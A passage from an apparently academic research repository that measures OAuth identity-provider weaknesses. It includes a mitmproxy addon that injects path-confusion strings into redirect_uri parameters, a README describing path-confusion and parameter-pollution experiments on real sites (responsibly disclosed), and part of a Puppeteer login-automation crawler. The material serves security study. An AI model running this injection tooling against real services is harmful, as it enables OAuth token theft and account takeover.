string",file=sys.stdout) 253 | 254 | b=flow.request.url.find("redirect_uri") 255 | f=flow.request.url.find("&",b) 256 | g=flow.request.url.find('%3F',b) 257 | 258 | if(f0): 261 | #find next param or end of string 262 | print(f'f greather than 0 so internal param', file=sys.stdout) 263 | ret=flow.request.url[b+13:f] 264 | else: 265 | ret=flow.request.url[b+13:] 266 | else: 267 | print(f'in this case %3F is present and it is before & pos%3F:{g} pos&:{f}', file=sys.stdout) 268 | print(f'g greather than 0 so internal param', file=sys.stdout) 269 | ret=flow.request.url[b+13:g] 270 | 271 | 272 | print(f'extracted redirect uri: {ret}', file=sys.stdout) 273 | #try use lib to concatenate pathconfusion 274 | #test1=urllib.parse.unquote(ret) 275 | test1=ret 276 | print(f'test url unquoted: {test1}', file=sys.stdout) 277 | test=urlparse(test1) 278 | testpath=test.path 279 | print(f'test path extracted: {testpath}', file=sys.stdout) 280 | newpath=testpath+ctx.options.inject 281 | print(f'new path generated: {newpath}', file=sys.stdout) 282 | newurl=test._replace(path=newpath).geturl() 283 | print(f'new url generated used for injection(unquoted): {newurl}', file=sys.stdout) 284 | quotedurl=urllib.parse.quote(newurl, safe='') 285 | print(f'new url generated(quoted): {quotedurl}', file=sys.stdout) 286 | 287 | temp=flow.request.url 288 | print(f'temp string: {temp}', file=sys.stdout) 289 | 290 | new=temp.replace(ret,newurl) 291 | print(f'temp string modified with replace: {new}', file=sys.stdout) 292 | flow.request.url=new 293 | 294 | 295 | addons = [ 296 | PathConfString() 297 | ] 298 | 299 | 300 | 301 | 302 | 303 | 304 | 305 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # IdPs Identification 2 | 3 | Crawls a list of websites to search for the OAuth IdPs they use. 4 | 5 | ## How does it work 6 | 7 | On a high level, the script does the following: 8 | 9 | 1. Visit the homepage of the site 10 | 2. If the homepage does not contain the login functionalities: 11 | 1. Crawl the site to find the login page. 12 | 3. Search the OAuth URLs and buttons on the login page. 
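The three steps above can be summarized by the following simplified sketch. This is only an illustration of the loop, not the script's actual main function: `is_login_page`, `get_links`, and `get_oauth_tag` are the helpers defined in `idps-identification.py`, while `find_oauth_triggers`, `providers`, and `max_pages` are hypothetical names used only here.

```python
import requests

def find_oauth_triggers(site, providers, max_pages=10):
    # Hypothetical, simplified version of the crawl loop: visit the homepage,
    # follow internal links until a login page is found, then look for the
    # OAuth buttons of each known provider (e.g., 'facebook', 'google').
    queue, seen, found = [f'https://{site}/'], set(), {}
    while queue and len(seen) < max_pages:
        url = queue.pop(0)
        if url in seen:
            continue
        seen.add(url)
        html = requests.get(url, timeout=30).text
        if is_login_page(url, html):            # keyword in the URL or a password input
            for provider in providers:
                tag, xpath = get_oauth_tag(html, provider)
                if tag is not None:
                    found[provider] = {'loginpage': url, 'xpath': xpath}
        else:
            queue.extend(get_links(url, html))  # keep crawling internal links
    return found
```

In the actual script, pages are loaded with Selenium and the findings are written to the reports and statistics folders; the detection heuristics are described in the sections below.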
 13 | 
 14 | ### Login pages identification
 15 | 
 16 | To detect a login page, the script looks for the following:
 17 | 
 18 | - Searches for links that contain some keywords (e.g., `/signin`, `/login`).
 19 | - Checks if the current page contains an input field of type `password`.
 20 | 
 21 | ### OAuth URLs and buttons identification
 22 | 
 23 | To detect the OAuth URLs and buttons, the script looks for the following:
 24 | 
 25 | For each **provider**:
 26 | 
 27 | - Searches for links containing the **provider** name and some keywords (e.g., `auth`, `login`, `signin`).
 28 | - Searches for specific HTML tags (`a`, `input`, and `button`) that contain the **provider** name and some keywords (e.g., `auth`, `login`, `signin`).
 29 | - If no such tag is found, it optionally searches through all the other HTML tags.
 30 | 
 31 | **Note**: the script makes heavy use of **denylists** to avoid false positives. The denylists are compiled by observing the results of the script while debugging and are not exhaustive.
 32 | 
 33 | ## How to run it
 34 | 
 35 | - Install the dependencies: `pip install -r requirements.txt`
 36 | 
 37 | ### On a single website
 38 | 
 39 | Run the script: `python3 idps-identification.py -t <TARGET>`
 40 | 
 41 | E.g.:
 42 | `python3 idps-identification.py -t imdb.com`
 43 | `python3 idps-identification.py -t medium.com`
 44 | 
 45 | #### Script arguments
 46 | 
 47 | ```bash
 48 | -h, --help            show this help message and exit
 49 | -t TARGET, --target TARGET
 50 |                       Target website
 51 | -S STATS, --stats STATS
 52 |                       Statistics folder
 53 | -R REPORTS, --reports REPORTS
 54 |                       Reports folder
 55 | -l LOGS, --logs LOGS  Logs folder
 56 | -L LINKS, --links LINKS
 57 |                       File containing the login links
 58 | -m MAX, --max MAX     Maximum number of URLs to crawl (Default: 10)
 59 | -N, --no-headless     Do not use a headless browser
 60 | -r, --retest          Retest the URLs
 61 | ```
 62 | 
 63 | ### On a list of websites
 64 | 
 65 | 1) Obtain the list of sites:
 66 |    On the Tranco site (https://tranco-list.eu), it is possible to download the most recent list of the top 1 million websites. The script expects to receive a list of sites in the same Tranco list format, although a slice of the list (e.g., the first 30 sites) can be provided to the script.
 67 | 
 68 | 2) Run the script: `python3 launcher.py --sites <SITES_LIST_FILE>`
 69 | 
 70 | The launcher will test the websites in the file concurrently (up to the maximum number of concurrent tests).
 71 | 
 72 | #### Launcher arguments
 73 | 
 74 | ```bash
 75 | -h, --help            show this help message and exit
 76 | -s SITES, --sites SITES
 77 |                       Sites list
 78 | -m MAX, --max MAX     Maximum number of sites to test concurrently (default: 5)
 79 | -a ARGUMENTS, --arguments ARGUMENTS
 80 |                       Additional arguments to pass to the crawler (use with = sign: -a="--arg1 --arg2")
 81 | -t, --testall         Test also already tested sites
 82 | -c CRAWLER, --crawler CRAWLER
 83 |                       Alternative crawler script name to launch
 84 | -d, --debug           Enable debug mode
 85 | ```
 86 | 
 87 | ### Workflow
 88 | 
 89 | The structure of the output JSON file of the `idps-identification.py` script differs from the one needed for the next step, **OAuth trigger evaluation**; therefore, we need to convert the JSON file to the correct format. To do so, we use the `convert.sh` script with the same list of sites used before to identify the OAuth triggers.
 90 | 
 91 | Run the script: `./convert.sh <SITES_LIST_FILE>`
 92 | 
 93 | The sites list file provided to the `convert.sh` script should follow the same CSV format as the Tranco list.
 94 | 
 95 | The script:
 96 | 
 97 | 1. Calls `generate-sites-files.py` to generate the single JSON files with the structure needed by the next step.
 98 | 
 99 | 2. Calls `merge-sites-files.py` to merge the single JSON files into a single one (json/sites.json).
100 | 
101 | ## Notice
102 | 
103 | The script has a high false-positive rate. In our research, this has not been a problem, since this was only the first step: in the next one, we used an automated browser to click on the buttons detected by this script to check whether they are actually OAuth buttons. In this script, we prioritized not missing any OAuth button, even if this means having many false positives. Improving the denylists to reduce the false-positive rate is recommended if this script is used for other purposes.
104 | 
105 | 
106 | # OAuth trigger validation
107 | 
108 | Receives the list of the sites' login pages and verifies that the OAuth buttons identified in the previous step can initiate an OAuth flow.
109 | The results are the list of the sites' evaluated OAuth triggers (Verified_Sites.json) and the list of top IdPs (Top_Idps.json).
110 | 
111 | ## How does it work
112 | 
113 | On a high level, the script does the following:
114 | 
115 | 1) Visits the login page of the site and exercises, one by one, the OAuth triggers identified previously.
116 | 2) Looks for changes in the browser, such as a new tab opening or a change of the page URL.
117 | 3) If a change occurs, it evaluates the landing page, searching for login-page identifiers such as the presence of a login button and OAuth identifiers in the page URL.
118 | 
119 | Output:
120 | The output folder contains a series of files with the results for each error type. In the script folder, the file Verified_Sites.json will include the sites' login pages whose OAuth triggers work correctly, and the file Top_Idps.json will contain the list of the most used IdPs among the inspected sites.
121 | 
122 | ## How to run it
123 | 
124 | 1) Install NodeJS from https://nodejs.org/en/download/.
125 |    Then, run the following command to install all the dependencies:
126 | 
127 |    `npm install chrome-launcher chrome-remote-interface url-parse until tldjs path argparse puppeteer fs`
128 | 
129 | Adjust the Chrome executable path at line 81 of verifysites.js to point to the Chrome executable file.
130 | Run the script: `python3 Start-SitesVerification.py <SITES_FILE> <OUTPUT_FOLDER>`
131 | 
132 | The list of sites provided to Start-SitesVerification.py is the result of the commands described above (the output of convert.sh), and it is stored in json/sites.json.
133 | 
134 | E.g.:
135 | `python3 Start-SitesVerification.py json/sites.json outputfolder`
136 | 
137 | If the reviewers want to skip the steps mentioned above (OAuth URL and button identification), the file Smallsetofsites.json can also be used to verify the script's functioning by running this command:
138 | 
139 | `python3 Start-SitesVerification.py Smallsetofsites.json outputfolder`
140 | 
141 | 
142 | ## Notice
143 | The threshold to classify an IdP as a top IdP is the value at line 385 of the script Start-SitesVerification.py (adoption by >3 sites).
144 | 
145 | # Path confusion Experiment
146 | 
147 | The script receives the list of sites in which to inject the path confusion payloads and logs all the network communications.
148 | 
149 | ## Notice
150 | Before starting the experiment, the IdPs of interest should be selected and, for each of those, an account and the login steps need to be codified in the IdPs_info file (IdP credentials step).
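For illustration, a single IdP entry has roughly the following shape. The field names are the ones read by Pup-Crawler.js (shown later in this repository); the element attributes and credentials below are hypothetical placeholders, not the content of the provided Idps_info.json, and an optional ExtraStep object with an instructions string is also supported by the crawler. The meaning of each field is described in the IdPs_info file section below.

```json
{
  "Username": "test@example.com",
  "Password": "<TEST_ACCOUNT_PASSWORD>",
  "Fill": {
    "User-Type": "Name",
    "Form-User": "email",
    "Pass-Type": "ID",
    "Form-Pass": "password"
  },
  "Submit": {
    "Button-Type": "ID",
    "Button": "login-button"
  },
  "Grant": {
    "Button-Type": "XPath",
    "Button": "//button[contains(text(), 'Continue')]"
  }
}
```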
151 | 
152 | To simplify the reviewer's job, we included in the file Idps_info.json the login information of 3 IdPs (Facebook, LINE, Twitter).
153 | The structure of the file is described below.
154 | 
155 | We provide a limited number of IdP entries to avoid any potential blocking by the IdPs for suspicious logins from unrecognized locations, which could negatively affect other ongoing research projects that currently use these test accounts.
156 | 
157 | ## IdPs_info file
158 | 
159 | The IdPs information file contains the IdPs' login information, i.e., the credentials and the steps to perform the login flow.
160 | The *-Type fields can have one of the following values: ID, Name, ClassName, or exception.
161 | Each value represents the type of the element attribute the crawler will use to identify, and then fill or click, the element in the IdP's login page.
162 | The Button-Type field extends the available values with XPath and QuerySelector, representing the XPath of the element or the query selector that identifies the element in the page.
163 | The exception type allows flexibility in configuring the actions performed by the crawler, to accommodate any possible variation in the login procedure between IdPs.
164 | 
165 | E.g.: `fill%%Name%%loginfmt%%test@example.com##sleep3##click%%ID%%idSIButton9%%login##sleep3`
166 | This exception fills out the username form and clicks the button with ID idSIButton9 before the password field is filled.
167 | 
168 | An exception can contain any sequence of fill, click, and sleep instructions.
169 | Fill is composed of the action fill, the separator %%, the *-Type, the separator %%, the element attribute, the separator %%, and the content to fill in.
170 | Click is composed of the action click, the separator %%, the *-Type, the separator %%, the element attribute, the separator %%, and the login step (either Login or Grant).
171 | Sleep is composed of the action sleep followed by the number of seconds to pause the login flow (e.g., sleep3).
172 | 
173 | ## How to run it
174 | 
175 | Before starting the experiment, mitmproxy should be installed on the system.
176 | The installation instructions for each operating system can be found at https://mitmproxy.org/.
177 | The required version is 9.0.1.
178 | 
179 | Run the script: `python3 Start-PathConfusion-exp.py <SITES_FILE> <EXPERIMENT_NAME> <ATTACK_LIST_FILE> <IDP_KEYWORDS_FILE> <IDPS_INFO_FILE>`
180 | 
181 | Example:
182 | `python3 Start-PathConfusion-exp.py Verified_Sites.json PathConfusion-experiment Pathconfusion-attacklist.json idp_keywords.json Idps_info.json`
183 | 
184 | 
185 | #### Script arguments
186 | 
187 | - `<SITES_FILE>`: file containing the sites' information (login pages) with the OAuth trigger information for each IdP identified.
188 | 
189 | - `<EXPERIMENT_NAME>`: experiment name, used for logging purposes.
190 | 
191 | - `<ATTACK_LIST_FILE>`: a dictionary of attack strings, where each attribute name also represents the name of the folder under which all the result files associated with that attack string will be stored, and the value represents the attack string that will be injected into the OAuth flow (Pathconfusion-attacklist.json, provided in the repo).
192 | 
193 | - `<IDP_KEYWORDS_FILE>`: a set of keywords used to identify the Authorization request of the OAuth flow in which to inject the path confusion string (idp_keywords.json, provided in the repo).
194 | 
195 | - `<IDPS_INFO_FILE>`: the IdPs information file, which contains the IdPs' account information and the login steps to automate the login procedure (Idps_info.json, provided in the repo).
196 | 
197 | 
198 | # Path confusion result
199 | 
200 | The script receives the path of the results folder generated in the previous step and the sites file on which the measurement has been performed.
201 | The script processes all the measurement result files in the folder and, for each attack folder, identifies the IdPs vulnerable to the path confusion string injected in the OAuth flow.
202 | This provides the total set of IdPs vulnerable to at least one of the path confusion strings tested, as reported in Section 4.3.
203 | 
204 | 
205 | ## How to run it
206 | Run the script: `python3 Analyze_Pathconfusion.py <RESULTS_FOLDER> <SITES_FILE>`
207 | 
208 | ## Notice
209 | To simplify the reviewer's job, we provide the data obtained from the execution of the previous command on a small subset of tested sites here:
210 | https://drive.google.com/file/d/1JKNcJu8sjCjY5MKPQIk3ar02AFSrpXzB/view?usp=sharing
211 | 
212 | 
213 | We provide this data because, after our previous responsible disclosure to all the IdPs found to be vulnerable, potentially no IdP should be found vulnerable anymore.
214 | This dataset can be used as input for the Analyze_Pathconfusion.py script to validate the script's functionality using this command:
215 | 
216 | Run the script: `python3 Analyze_Pathconfusion.py Pathconfusion-measurement Smallsetofsites.json`
217 | 
218 | # OAuth Parameter Pollution
219 | 
220 | ## How does it work
221 | 
222 | To identify the IdPs vulnerable to the OPP attack, we implemented a testing client for each IdP and manually injected an OAuth code parameter into the redirect_uri of the Authorization request (an illustrative sketch of such a poisoned request is shown below). To verify the IdP's vulnerability, we observed whether the injected code is reflected in the Authorization response. The IdPs that reflect the injected parameter are considered vulnerable.
223 | The number of vulnerable IdPs represents the result reported in Section 5.2.
224 | 
225 | ## How to run it
226 | 
227 | The execution of the test is relatively simple and does not involve any automation of the procedure.
228 | 
229 | Before running the script, a folder named templates needs to be created, and the files attack.html and login.html should be placed inside of it.
230 | The client application (located in the parent folder of templates) is then started by running this command:
231 | `python3 facebook.py`
232 | 
233 | The client application has three buttons that initiate the authorization request either normally or with the path confusion or OPP attack injected.
234 | The attacks are hardcoded in the application methods, and the same options are also provided for the redeem step.
235 | Any changes to these methods should be performed in the application code.
236 | The complete cases for each IdP can be tested and inspected using the available requ
237 | 
238 | ## Notice
239 | 
240 | We provide only the skeleton of a testing client application (the Facebook one) of the kind we used to test each IdP.
241 | For each IdP, it is necessary to create a new configuration with the IdP, which will include the registered redirect_uri and provide the Client_ID and the Client_secret that must be included in the application code for it to work correctly.
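As an illustration of the injection described above, a poisoned authorization request can be built roughly as follows. This is a minimal sketch, not the code of facebook.py: the endpoint, CLIENT_ID, REDIRECT_URI, and the injected value are placeholder assumptions that must be replaced with the values obtained when configuring the application with the IdP.

```python
from urllib.parse import urlencode

# Illustrative sketch only -- NOT the actual facebook.py code.
# AUTH_ENDPOINT, CLIENT_ID and REDIRECT_URI are placeholders for the
# values obtained when registering the test application with the IdP.
AUTH_ENDPOINT = 'https://idp.example/oauth/authorize'
CLIENT_ID = '<CLIENT_ID>'
REDIRECT_URI = 'https://client.example/callback'

def opp_authorization_url(injected_code='INJECTED-CODE'):
    # The attacker-chosen `code` parameter is appended to the redirect_uri
    # itself; a vulnerable IdP reflects it in the Authorization response
    # next to the code it freshly issues.
    poisoned_redirect = f'{REDIRECT_URI}?code={injected_code}'
    params = {
        'client_id': CLIENT_ID,
        'redirect_uri': poisoned_redirect,  # percent-encoded by urlencode()
        'response_type': 'code',
        'state': 'opp-test',
    }
    return f'{AUTH_ENDPOINT}?{urlencode(params)}'

print(opp_authorization_url())
```

If the IdP is vulnerable, the redirection back to the client carries both the injected code and the freshly issued one, which is exactly the reflection the manual check described above looks for.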
242 | For Facebook, the instructions to create such a configuration could be found here: 243 | https://developers.facebook.com/docs/facebook-login/guides/advanced/manual-flow 244 | 245 | Github: 246 | https://docs.github.com/en/apps/oauth-apps/building-oauth-apps/creating-an-oauth-app 247 | 248 | OK.ru: 249 | https://apiok.ru/en/ext/oauth/ 250 | 251 | LinkedIn: 252 | https://learn.microsoft.com/en-us/linkedin/shared/authentication/authorization-code-flow?tabs=HTTPS1 253 | 254 | 255 | Once the application parameters (line 16 to 25) has been included, the script can be run, and the experiment could start by using the provided button in the web interface 256 | 257 | # redirect URI Validation in Redeem Proces: 258 | 259 | ## How does it work 260 | 261 | By reusing the Client Application used in the previous step to identify the IdPs vulnerable to the OPP attack, we measured the IdPs that improperly validate the redirect_uri in the Redeem Process. 262 | We followed the same methodology of the previous step by injecting an OAuth code in the Authorization step. Once we receive the two OAuth code parameters, we initiate the redeem step with the newly generated code by the IdP with an untouched redeem request. This will create a difference between the redirect_uri used in the Authorization request(poisoned) and the one provided in the Access Token request. The IdPs that allow the flow to proceed are marked as vulnerable. This will give the result of Section 6.2 263 | 264 | The execution of the test is relatively simple and does not involve any automation of the procedure. 265 | -------------------------------------------------------------------------------- /Pup-Crawler.js: -------------------------------------------------------------------------------- 1 | const puppeteer = require('puppeteer'); 2 | const FS = require('fs'); 3 | const TLDJS = require('tldjs'); 4 | const ArgParse = require('argparse'); 5 | 6 | let SITE = null; 7 | let IDP = null; 8 | let IDP_Info = {}; 9 | let XPathSSOElem=null; 10 | let newwindow=false; 11 | let measurement=""; 12 | 13 | function parseArguments() { 14 | let parser = new ArgParse.ArgumentParser({ 15 | add_help:true, 16 | description: 'Argparse example' 17 | }); 18 | 19 | parser.add_argument( 20 | '--parameters', 21 | { 22 | action: 'store', 23 | required: true, 24 | help: 'parameters file' 25 | } 26 | ); 27 | 28 | let args = parser.parse_args(); 29 | PARAMETER= args.parameters; 30 | } 31 | 32 | async function Exception(page,commands,step){ 33 | console.log("exception received commands: %s",commands); 34 | instructions=commands.split('##'); 35 | console.log("instructions lenght:%s",instructions.length); 36 | console.log(instructions); 37 | try { 38 | for (var i = 0; i < instructions.length; i++) { 39 | console.log("Analyze instruction:%s",instructions[i]); 40 | if(instructions[i].includes("sleep") && !(instructions[i].includes("%%"))){ 41 | console.log("wait for next instruction:%s",instructions[i]); 42 | await page.waitForTimeout(Number(instructions[i].replace("sleep",""))*1000); 43 | } 44 | else{ 45 | if(instructions[i].includes("%%")){ 46 | split=instructions[i].split("%%"); 47 | //first command type second id type third id 48 | if(split[0]==="fill"){ 49 | await Fillform(page,split[1],split[2],split[3]); 50 | } 51 | else if(split[0]==="click"){ 52 | await Click_Button(page,split[1],split[2],split[3]); 53 | } 54 | } 55 | else{ 56 | console.log("execute next instruction:%s",instructions[i]); 57 | await page.evaluate(instructions[i]); 58 | } 59 | } 60 | } 61 | } 
catch (ex) { 62 | console.log("Step: %s Exception in execution of instruction: %s",step,commands); 63 | return ex.message; 64 | } 65 | return true; 66 | } 67 | 68 | 69 | async function Fillform(page,form_type,form,content){ 70 | //include try catch for node not found and report error 71 | console.log("Fill form received form type: %s\nform: %s\ncontent: %s",form_type,form,content); 72 | try { 73 | if(form_type==="ID"){ 74 | await page.type("[id=\""+form+"\"]",content, { delay: 100 }); 75 | return true; 76 | } 77 | else if(form_type==="Name"){ 78 | await page.type("[name=\""+form+"\"]",content, { delay: 100 }); 79 | return true; 80 | } 81 | else if(form_type==="ClassName"){ 82 | await page.type("[class=\""+form+"\"]",content, { delay: 100 }); 83 | return true; 84 | } 85 | else if(form_type==="exception"){ 86 | return form; 87 | } 88 | } catch (ex) { 89 | console.log("Exception in Filling form: %s and content: %s",form,content); 90 | console.log(ex); 91 | return false; 92 | } 93 | } 94 | 95 | async function Click_Button(page,button_type,button,step){ 96 | console.log("Click Button received button type: %s\nbutton: %s\nstep: %s",button_type,button,step); 97 | try { 98 | if(button_type==="XPath"){ 99 | console.log("Click_Button with XPath element"); 100 | var elements = await page.$x(button); 101 | console.log("obtained this element:%s",elements); 102 | pr=await elements[0].click(); 103 | console.log("result click: %s",pr); 104 | return true; 105 | } 106 | else if(button_type==="ID"){ 107 | console.log("Click_Button with ID element"); 108 | pr=await page.click("[id=\""+button+"\"]"); 109 | console.log("result click: %s",pr); 110 | return true; 111 | } 112 | else if(button_type==="Classname"){ 113 | console.log("Click_Button with ClassName element"); 114 | pr=await page.click("[class=\""+button+"\"]"); 115 | console.log("result click: %s",pr); 116 | return true; 117 | } 118 | else if(button_type==="Name"){ 119 | console.log("Click_Button with Name element"); 120 | pr=await page.click("[name=\""+button+"\"]"); 121 | console.log("result click: %s",pr); 122 | return true; 123 | } 124 | else if(button_type==="QuerySelector"){ 125 | console.log("Click_Button with QuerySelector element"); 126 | pr=await page.click(button); 127 | console.log("result click: %s",pr); 128 | return true; 129 | } 130 | else if(button_type==="exception"){ 131 | return Exception(page,button,step); 132 | //return button; 133 | } 134 | } catch (ex) { 135 | if(step==="Grant"){ 136 | console.log(ex.message); 137 | console.log("received an error during grant click. 
Continue the measurement and check if sproper redirect and closed window"); 138 | return true; 139 | } 140 | else{ 141 | console.log("Step: %s Exception in execution!!!!!",step); 142 | console.log(ex.message); 143 | return ex.message; 144 | } 145 | } 146 | } 147 | 148 | async function FindIdentifies(html) { 149 | var identifiers=["Mario Rossi","Mario","Rossi","mario","rossi","mario rossi","tommycall.text@gmail.com","tommycall.text"]; 150 | var arrayLength = identifiers.length; 151 | for (var i = 0; i < arrayLength; i++) { 152 | let res = html.search(identifiers[i]) 153 | if(res >0){ 154 | console.log("identifier found"); 155 | console.log(identifiers[i]); 156 | return true; 157 | } 158 | } 159 | //search for identifies in html 160 | return false; 161 | } 162 | 163 | async function Savehtml(name,html){ 164 | //save file with HTML 165 | FS.writeFileSync(name+"-HTMLWithID",html); 166 | } 167 | 168 | async function ErrorInURL(checkURL) { 169 | //search for erorr in URL 170 | //expand error in url to make it complete 171 | var identifiers=["error","fail"]; 172 | var arrayLength = identifiers.length; 173 | for (var i = 0; i < arrayLength; i++) { 174 | let res = checkURL.search(identifiers[i]) 175 | if(res >0){ 176 | console.log("error found in url"); 177 | console.log(identifiers[i]); 178 | console.log(checkURL); 179 | return true; 180 | } 181 | } 182 | return false; 183 | } 184 | 185 | async function ObtainSelector(type,string){ 186 | //console.log("obtain selector received type: %s\nString: %s",type,string); 187 | if(type==="exception"){ 188 | instructions=string.split('##'); 189 | for (var i = 0; i < instructions.length; i++) { 190 | if(instructions[i].includes("fill")){ 191 | div=instructions[i].split('%%'); 192 | temp= await ObtainSelector(div[1],div[2]); 193 | return temp; 194 | } 195 | } 196 | return ""; 197 | } 198 | else if(type==="Name"){ 199 | return "[name=\""+string+"\"]"; 200 | } 201 | else if(type==="ID"){ 202 | return "[id=\""+string+"\"]"; 203 | } 204 | else if(type==="ClassName"){ 205 | return "[class=\""+string+"\"]"; 206 | } 207 | return ""; 208 | } 209 | 210 | async function AnalizeResult(browser,IDP,domainbegin,initial_url,domainreturn,return_url,html,measurement){ 211 | console.log("analyze result measurement:"); 212 | 213 | if(domainreturn===IDP){ 214 | //blocked in login part 215 | console.log("login procedure stopped in IDP!!!"); 216 | console.log("RESULT-EXPERIMENT:-1"); 217 | return -1; 218 | } 219 | else{ 220 | let verify=await FindIdentifies(html); 221 | if(verify){ 222 | Savehtml(OutputPath+OutputName,html); 223 | console.log("found identifiers in the redirection page"); 224 | console.log("domain return:%s Domain begin:%s",domainreturn,domainbegin); 225 | if(domainreturn === domainbegin){//back to the same domain of initial page 226 | if(return_url === initial_url){ 227 | console.log("same url after login succesful login!!!"); 228 | console.log("RESULT-EXPERIMENT:1"); 229 | return 1; 230 | } 231 | else{ 232 | let check= await ErrorInURL(return_url); 233 | console.log("print check url error:%s",check); 234 | if(check){ 235 | //error in url not succesful 236 | console.log("found identifier in page but error in redirect url-->visual check!!!"); 237 | console.log("RESULT-EXPERIMENT:-1"); 238 | return -1; 239 | } 240 | else{ 241 | console.log("success login redirect to initial domain with identifiers in the page"); 242 | console.log("RESULT-EXPERIMENT:1"); 243 | return 1; 244 | } 245 | } 246 | } 247 | else{ 248 | //diff domain but identifiers in html look for error in 
url 249 | let check= await ErrorInURL(return_url); 250 | console.log("print check url error:%s",check); 251 | if(check){ 252 | //error in url not succesful 253 | console.log("found identifier in page but redirect to a different domain and error in redirect url-->visual check!!!"); 254 | console.log("RESULT-EXPERIMENT:-1"); 255 | return -1; 256 | } 257 | else{ 258 | console.log("redirect to a different domain with identifiers in page and no error check for connected domain!!"); 259 | console.log("domain return:%s Domain begin:%s",domainreturn,domainbegin); 260 | console.log("RESULT-EXPERIMENT:0"); 261 | return 1; 262 | } 263 | } 264 | } 265 | else{ 266 | console.log("NOT found identifiers in the redirection page"); 267 | console.log("domain return:%s Domain begin:%s",domainreturn,domainbegin); 268 | if(domainreturn === domainbegin){//back to the same domain of initial page 269 | if(return_url === initial_url){ 270 | console.log("success login redirect to initial link but identifiers not found in the page->visual check!!!"); 271 | console.log("RESULT-EXPERIMENT:0"); 272 | return 0; 273 | } 274 | else{ 275 | let check= await ErrorInURL(return_url); 276 | console.log("print check url error:%s",check); 277 | if(check){ 278 | console.log("no identifiers in page redirect to a different page with error in redirect url"); 279 | console.log("RESULT-EXPERIMENT:-1"); 280 | return -1; 281 | } 282 | else{ 283 | console.log("success login redirect to same domain of initial page no error in url but identifiers not found in the page->visual check!!!"); 284 | console.log("RESULT-EXPERIMENT:0"); 285 | return 0; 286 | } 287 | } 288 | } 289 | else{ 290 | console.log("redirect to different domain and no identifiers in page not succesful login!!"); 291 | console.log("RESULT-EXPERIMENT:-1"); 292 | return -1; 293 | } 294 | } 295 | } 296 | } 297 | 298 | async function AnalizeResult_New_Window(browser,IDP,page,newwindow,domainbegin,initial_url,measurement){ 299 | 300 | console.log("New windows: measurement:%s analyze result received:initial_url:%s\ndomain begin:%s",measurement,initial_url,domainbegin); 301 | urlcheck=page.url(); 302 | 303 | if(urlcheck.includes("#")){ 304 | urlcheck=urlcheck.split("#")[0]; 305 | console.log("remove fragment to make a right comparison new url is:%s",urlcheck); 306 | } 307 | console.log("page url extracted from page variable:%s",urlcheck); 308 | console.log("print variables used for the check:page url%s\nIDP:%s",page.url(),IDP); 309 | if(urlcheck===initial_url && TLDJS.parse(newwindow.url()).domain===IDP){ 310 | //take screenshot of still open window and stop here error in login!! 
311 | console.log("initial page with the same url and new windows stuck with IDP"); 312 | await newwindow.screenshot({path: OutputPath+OutputName+"_StillOpenWindow_AfterSSOLogin.png" ,fullPage: true}); 313 | var html=await page.content(); 314 | let verify=await FindIdentifies(html); 315 | 316 | if(verify){ 317 | Savehtml(OutputPath+OutputName,html); 318 | console.log("login window still open check why!!!!"); 319 | console.log("success login redirect to initial domain with identifiers in the page"); 320 | console.log("RESULT-EXPERIMENT:1"); 321 | await browser.close(); 322 | process.exit(1); 323 | } 324 | else{ 325 | console.log("new windows still open no identifiers in initial window and no redirection in initial page error in login procedure!!"); 326 | await browser.close(); 327 | console.log("RESULT-EXPERIMENT:-1"); 328 | process.exit(-1); 329 | } 330 | } 331 | else if(urlcheck===initial_url && TLDJS.parse(newwindow.url()).domain===domainbegin){ 332 | //redirected to initial domain in new window check that window 333 | console.log("redirected to the initial site domain in the new window, analyze this windows for the result"); 334 | var html=await newwindow.content(); 335 | return_url= await newwindow.url(); 336 | domainreturn= await TLDJS.parse(return_url).domain; 337 | 338 | await AnalizeResult(browser,IDP,domainbegin,initial_url,domainreturn,return_url,html,measurement); 339 | } 340 | else if(!(urlcheck===initial_url)){ 341 | //still open new window but not initial url check error and identifiers 342 | let return_url=page.url(); 343 | let check= await ErrorInURL(return_url); 344 | console.log("print check url error:%s",check); 345 | if(check){ 346 | console.log("login windows still open check why!! and error in redirect url-->visual check!!!"); 347 | await browser.close(); 348 | console.log("RESULT-EXPERIMENT:-1"); 349 | process.exit(-1); 350 | } 351 | else{ 352 | var html=await page.content(); 353 | let verify=await FindIdentifies(html); 354 | if(verify){ 355 | Savehtml(OutputPath+OutputName,html); 356 | console.log("login window still open check why!!!!"); 357 | console.log("success login identifiers in initial page"); 358 | console.log("RESULT-EXPERIMENT:1"); 359 | await browser.close(); 360 | process.exit(1); 361 | } 362 | else{ 363 | console.log("new windows still open no identifiers in initial page no error but redirected to a different page -->visual check"); 364 | await browser.close(); 365 | console.log("RESULT-EXPERIMENT:-1"); 366 | process.exit(-1); 367 | } 368 | } 369 | } 370 | } 371 | 372 | 373 | 374 | (async() => { 375 | console.log("Step1 get info for the crawler"); 376 | parseArguments(); 377 | let rawdata = FS.readFileSync(PARAMETER); 378 | let params = JSON.parse(rawdata); 379 | SITE = params["site"]; 380 | IDP = params["idp"]; 381 | measurement =params["measurement"]; 382 | IDP_Info = params["idp_info"]; 383 | XPathSSOElem = params["xpath"]; 384 | OutputName = params["name"]; 385 | OutputPath = params["outpath"]; 386 | console.log("Measurements: %s\nparameters received site: %s\nIDP: %s\nIDP_Info: %s\nXPathSSOelem: %s\nOutputpath: %s\nOutputName: %s",measurement,SITE,IDP,IDP_Info,XPathSSOElem,OutputPath,OutputName); 387 | 388 | 389 | //Step2: surf on the login page save initial page url then take a screenshot and then click in the SSO element 390 | console.log("Step2:start the login procedure") 391 | //start browser 392 | //'--proxy-server=http://127.0.0.1:7777', 393 | const browser = await puppeteer.launch({args:['--disable-gpu', 394 | '--no-sandbox', 395 | 
